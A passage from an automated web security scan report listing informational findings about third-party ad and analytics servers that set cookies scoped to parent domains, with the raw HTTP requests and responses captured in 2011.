Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=/nsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzA4NzsxOjE3NjVpZnUxYWtrYzc5OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=b8sYO9aFHYIiGT8sQdwSkaMxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODM5NTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:06:35 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.27. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmsacramento/1/H.20.3/s83257504000794?AQB=1&ndh=1&t=3/8/2011%2019%3A48%3A59%206%20300&pageName=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&g=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&r=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&cc=USD&ch=Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&server=blogs.sacbee.com&events=event7&c1=http%3A//blogs.sacbee.com/the_state_worker/&h1=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c3=*Product&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=Sacramento%20Bee%3A%20Moveable%20Type%3A%20Staff%3A%20&v4=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&c5=.threshold&c6=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c13=Unknown&c20=%7CU%3A%20Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker%20%3A%20blogs.sacbee.com&c33=8%3A30PM&c34=Saturday&c39=%20%23navlink%3Dnavdrop&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&c44=Sto%3A%203000px%20%3A%203sc%20%3A%20100%25&c48=YTextAd%3A%20*Product%3Ablogs.sacbee.com%3AProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&pidt=1&oid=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&ot=A&AQE=1 HTTP/1.1
Host: nmsacramento.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bax7Fmox7Emaibxxc=[CS]v4|27316752051606A2-400001778004310F|4E62CAD6[CE]; Expires=Fri, 2 Sep 2016 01:04:36 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:04:36 GMT
Last-Modified: Mon, 05 Sep 2011 01:04:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CEA4-0D28-2AB4C075"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=62294659&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop
xserver: www388
Content-Length: 0
Content-Type: text/plain


11.28. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111960; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^2^1315097284^1315097639&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:53:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

11.29. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1228

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

11.30. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. In this response the Set-Cookie headers carry Domain=.revsci.net although the issuing host is pix04.revsci.net, so every host under revsci.net will receive (and can overwrite) them.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; 
rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOM9CLgIMVZ94v40baTDzlRIkdUWSQGfFxfA6hPpUKyeNNoj0iIN6Cv9sUGvLEXvKAFu9JT7uIABOODftm+QaDSbsuf25QFhAJtgIo+GwOzrVo4YkL0xbKLuQiu28WRitUy3Kb67rhK+xW853LY2RBECs8dSNYOibsRLGdMUdsI2f//Emd6k6iE1p2Wou0rWthgALXeX8ILkdmFAdhV3cQvpFqMGLq/eFx91Js8rLMz0cCNgkRarHvfvZ2ZEHYUfwWV/ukw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:52:30 GMT

GIF89a.............!.......,...........D..;

11.31. http://pix04.revsci.net/D08734/a1/0/3/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0/FLgIMlrE7uk0GmV2eAbqnnz9mBC2OsJRojxDyMaIk9TEJ3YH2aKvvUGIZ/u6UZUfRMVa6yiD7njMXjPX3N4DMhY2ZviRGuNIpq5mAQ5cYacVa3palkMmqiTA44pzy0TsSp9dZGV0wREhmZA++cX1MA6EP1ziTd85x9KCxFvIWPIoOtMDGZLcM0Kdb1Un8sm56weCl5qnY0SxvtyYPOEr5SCNdUsKIvYBTSfQNKKkClanTYJF2y5vVLyjL4pXJ2Go=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:51:15 GMT; Path=/
X-Proc-ms: 5
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:14 GMT
Content-Length: 444

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = ['D08734_72639','D08734_72674','D08734_72861','D08734_72132','D08734_72122','D08734_72123','D08734_72124','D08734_72125','D08734_72126
...[SNIP]...

11.32. http://pix04.revsci.net/F09828/a4/0/0/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="pUMdJT+DPwIU1E3imYKC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeWNdjLp9DlTHNdGEjk0NgfVVxKB0vEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODmMGd6cbMIsOXjJJNoa5nJ+eMSF/OABhpFm4wTRoY4cV6nEhA+pPAPy1QsXwnrMI2Zr8YTxWbBFIuEKkLLkygAFgwReoUQA9386ahYRsIEOwLY1DxuNmCEA3ro/eDkCbAcvqEvEaCtehjMwNcehJlJKiT/DVk7YmgejB9LBYfaimbXWiFgHFLjhtiBdhR3QpExC/FZXGtZeYojPCKCYJk+UD2QwPJi0x4kB7qieRJB64L9qQZwSP3sZkJ0s95Evev44uttXviYp1xfQC7lDMqITkrFCcbAngqEdxGJfzn1K4jUovAh1xsgERtdrv5sDDDoP5l7x3v9OMyltap0D9DjeeI2xfPY3JHmgN3/CWnVJ63A+xxBghIzHc1IZiEqULnZ8XSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1Fs0XJgbBEUuIf0mSjMrOz9tB1anlpxt/RSHQozzS8XpqrHBXaDTF3WAjVith8T1kQ1rHVxp0K8xYCAYP4tXhXnOCkNDxOwu9yx2EwoZwPUwZVyA3VLxXvUyTVXxj91/H/aU76/1P6hCLxCrR/eIv22mWPYArDid/UvTXbwSjnYN/HMqJiULRLzLBTBUxAr3GLRtUEz"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; 
